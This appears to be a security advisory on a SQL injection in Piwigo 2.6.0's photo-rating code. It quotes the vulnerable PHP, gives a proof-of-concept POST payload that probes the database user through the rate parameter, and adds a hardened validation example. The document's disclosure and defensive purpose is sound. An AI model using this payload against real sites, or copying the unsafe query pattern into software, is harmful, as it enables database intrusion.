Piwigo 2.6.0 /picture.php SQL Injection Vulnerability

Published: 2025-04-13
Revised: 2025-04-13

- /include/functions_rate.inc.php

```php
if (!isset($rate)
    or !$conf['rate']
    or !in_array($rate, $conf['rate_items']))   // no third argument: loose comparison
{
  return false;
}
……..
pwg_query($query);

$query = '
INSERT INTO '.RATE_TABLE.'
  (user_id,anonymous_id,element_id,rate,date)
  VALUES ('
    .$user['id'].','
    .'\''.$anonymous_id.'\','
    .$image_id.','
    .$rate                                     // $rate concatenated into SQL unescaped
    .',NOW())
;';
pwg_query($query);
```

The check on rate uses in_array in non-strict (loose) mode, so it can be bypassed. rate is then concatenated directly into the SQL statement, which produces the injection.

- /picture.php

```php
case 'rate' :
{
  include_once(PHPWG_ROOT_PATH.'include/functions_rate.inc.php');
  rate_picture($page['image_id'], $_POST['rate']);   // $_POST['rate'] passed through unchanged
  redirect($url_self);
}
```

The user-supplied rate is passed to the rate_picture function.

When the user POSTs:

```
rate=0+ascii(substring(user(),1,1))
```

to:

```
http://10.211.55.3/piwigo/picture.php?/1/category/1&action=rate
```

The page returns: (screenshot not preserved)
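An added illustration from the defender's side (example code, not Piwigo's own): the loose allow-list check beside a strict one, run on a normal rating and on the advisory's payload. It assumes the default rate_items list 0..5, and the loose result described in the comments holds on PHP 5 and 7.

```php
<?php
// Added example, not Piwigo's own code: the loose allow-list check that
// rate_picture() relied on, beside a hardened version of the same check.
// $conf['rate_items'] is assumed to be the default integer list 0..5.
$conf = ['rate' => true, 'rate_items' => [0, 1, 2, 3, 4, 5]];

// Vulnerable check: in_array() without its third argument compares loosely.
// On PHP 5 and 7 a leading-numeric string such as "0+ascii(...)" compares
// equal to the integer 0, so the attacker-controlled string passes the list
// unchanged and reaches the string-built INSERT. (PHP 8 changed this
// comparison, but the check is still wrong: it never normalises $rate.)
function rate_is_allowed_loose(array $conf, $rate)
{
    return isset($rate) && $conf['rate'] && in_array($rate, $conf['rate_items']);
}

// Hardened check: accept only a short string of digits, convert it to int,
// and use strict in_array(). What comes out is an integer from the allow-list,
// so the later concatenation into SQL can no longer carry attacker syntax.
function rate_is_allowed_strict(array $conf, $rate)
{
    if (!isset($rate) || !$conf['rate'] || !is_scalar($rate)) {
        return false;
    }
    if (!preg_match('/^[0-9]{1,2}$/', (string) $rate)) {
        return false;
    }
    return in_array((int) $rate, $conf['rate_items'], true);
}

// Constructed inputs: a legitimate rating and the payload from the advisory.
$inputs = ['3', '0+ascii(substring(user(),1,1))'];
foreach ($inputs as $rate) {
    printf("%-34s loose=%-5s strict=%s\n",
        $rate,
        var_export(rate_is_allowed_loose($conf, $rate), true),
        var_export(rate_is_allowed_strict($conf, $rate), true));
}
```

On PHP 5/7 the payload line prints loose=true and strict=false; the strict check is the one that closes the bypass, and since it yields an integer it also removes the concatenation risk in the INSERT.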
